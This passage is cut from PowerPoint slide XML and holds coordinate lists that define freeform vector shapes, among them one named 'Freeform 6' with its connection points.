                    <a:pt x="2288" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2269" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2262" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2225" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2203" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2187" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2180" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2174" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2165" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2153" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2127" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2102" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091" y="164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085" y="164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2081" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2075" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2066" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2047" y="151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2041" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2005" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1988" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1954" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1948" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1918" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1883" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1864" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1861" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1824" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1743" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1722" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688" y="307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1682" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1672" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1634" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1610" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598" y="307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593" y="305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1577" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1572" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1566" y="295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1555" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1549" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543" y="284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1534" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1505" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1477" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1454" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1349" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1290" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1287" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1268" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1218" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1203" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1121" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1117" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034" y="322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1007" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975" y="364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960" y="373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929" y="383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886" y="383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="870" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865" y="373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855" y="366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="846" y="356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829" y="337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821" y="326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811" y="307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418" y="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Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4275" y="1569"/>
              <a:ext cx="1123" cy="336"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="437" y="62"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="361" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="277" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="195" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="119" y="34"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="3" y="161"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="3" y="234"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="45" y="315"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="123" y="367"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="207" y="380"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="304" y="380"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="397" y="399"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="475" y="454"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="536" y="528"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="596" y="603"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="684" y="662"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="754" y="669"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="834" y="662"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="906" y="627"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="978" y="566"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1068" y="494"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1140" y="466"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1220" y="466"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1313" y="487"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1395" y="521"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1490" y="580"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1560" y="582"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1628" y="555"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1691" y="506"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1737" y="437"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1777" y="367"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1864" y="315"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1946" y="359"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2024" y="384"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2094" y="376"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2164" y="348"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2223" y="270"/>
